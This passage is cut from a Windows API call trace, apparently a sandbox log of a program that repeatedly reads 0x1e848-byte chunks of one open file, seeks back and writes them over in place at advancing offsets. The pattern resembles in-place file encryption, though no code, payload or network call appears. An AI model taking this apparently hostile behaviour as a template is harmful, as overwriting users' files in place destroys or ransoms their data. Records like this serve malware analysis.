dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.011] GetProcessHeap () returned 0x500000 [0125.011] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.011] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d61d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.011] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.100] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d61d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.100] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.100] GetProcessHeap () returned 0x500000 [0125.100] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.100] GetProcessHeap () returned 0x500000 [0125.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.101] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d9ee20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.101] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.134] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d9ee20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.134] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.135] GetProcessHeap () returned 0x500000 [0125.135] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.135] GetProcessHeap () returned 0x500000 [0125.135] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.135] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ddbeb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.135] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.160] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ddbeb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.160] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.161] GetProcessHeap () returned 0x500000 [0125.161] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.161] GetProcessHeap () returned 0x500000 [0125.161] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.161] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e18f40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.161] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.219] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e18f40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.220] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.220] GetProcessHeap () returned 0x500000 [0125.220] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.220] GetProcessHeap () returned 0x500000 [0125.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.220] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e55fd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.220] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.262] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e55fd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.262] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.263] GetProcessHeap () returned 0x500000 [0125.263] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.263] GetProcessHeap () returned 0x500000 [0125.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.263] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e93060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.263] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8e93060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.389] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.390] GetProcessHeap () returned 0x500000 [0125.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.390] GetProcessHeap () returned 0x500000 [0125.390] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.390] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ed00f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.391] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.452] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ed00f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.452] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.453] GetProcessHeap () returned 0x500000 [0125.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.453] GetProcessHeap () returned 0x500000 [0125.453] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.453] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f0d180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.453] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.857] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f0d180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.857] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.857] GetProcessHeap () returned 0x500000 [0125.857] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.857] GetProcessHeap () returned 0x500000 [0125.857] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.858] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f4a210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.858] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.906] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f4a210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.906] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.907] GetProcessHeap () returned 0x500000 [0125.907] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.907] GetProcessHeap () returned 0x500000 [0125.907] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.907] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f872a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.907] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.960] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8f872a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.960] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.961] GetProcessHeap () returned 0x500000 [0125.961] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.961] GetProcessHeap () returned 0x500000 [0125.961] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.961] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8fc4330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.961] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.101] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8fc4330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.102] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.102] GetProcessHeap () returned 0x500000 [0126.102] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.102] GetProcessHeap () returned 0x500000 [0126.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.102] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90013c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.102] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.349] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90013c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.349] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.350] GetProcessHeap () returned 0x500000 [0126.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.350] GetProcessHeap () returned 0x500000 [0126.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.350] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x903e450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.350] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.386] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x903e450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.386] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.386] GetProcessHeap () returned 0x500000 [0126.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.386] GetProcessHeap () returned 0x500000 [0126.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.386] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x907b4e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.387] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.402] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x907b4e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.402] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.402] GetProcessHeap () returned 0x500000 [0126.402] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.402] GetProcessHeap () returned 0x500000 [0126.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.403] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90b8570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.403] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.410] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90b8570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.410] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.410] GetProcessHeap () returned 0x500000 [0126.411] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.411] GetProcessHeap () returned 0x500000 [0126.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.411] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90f5600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.411] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.479] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90f5600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.479] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.481] GetProcessHeap () returned 0x500000 [0126.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.481] GetProcessHeap () returned 0x500000 [0126.481] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.481] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9132690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.481] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.490] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9132690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.491] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.491] GetProcessHeap () returned 0x500000 [0126.491] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.491] GetProcessHeap () returned 0x500000 [0126.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.491] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x916f720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.491] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.561] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x916f720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.561] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.561] GetProcessHeap () returned 0x500000 [0126.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.562] GetProcessHeap () returned 0x500000 [0126.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.562] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x91ac7b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.562] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0126.572] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x91ac7b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.572] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0126.572] GetProcessHeap () returned 0x500000 [0126.572] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0126.572] GetProcessHeap () returned 0x500000 [0126.572] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0126.572] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x91e9840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.573] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.580] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x91e9840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.581] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.581] GetProcessHeap () returned 0x500000 [0127.581] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.581] GetProcessHeap () returned 0x500000 [0127.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.582] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92268d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.582] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.657] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92268d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.658] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.658] GetProcessHeap () returned 0x500000 [0127.658] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.658] GetProcessHeap () returned 0x500000 [0127.658] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.658] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9263960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.658] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.773] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9263960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.773] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.773] GetProcessHeap () returned 0x500000 [0127.774] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.774] GetProcessHeap () returned 0x500000 [0127.774] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.774] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92a09f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.774] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.826] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92a09f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.826] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, 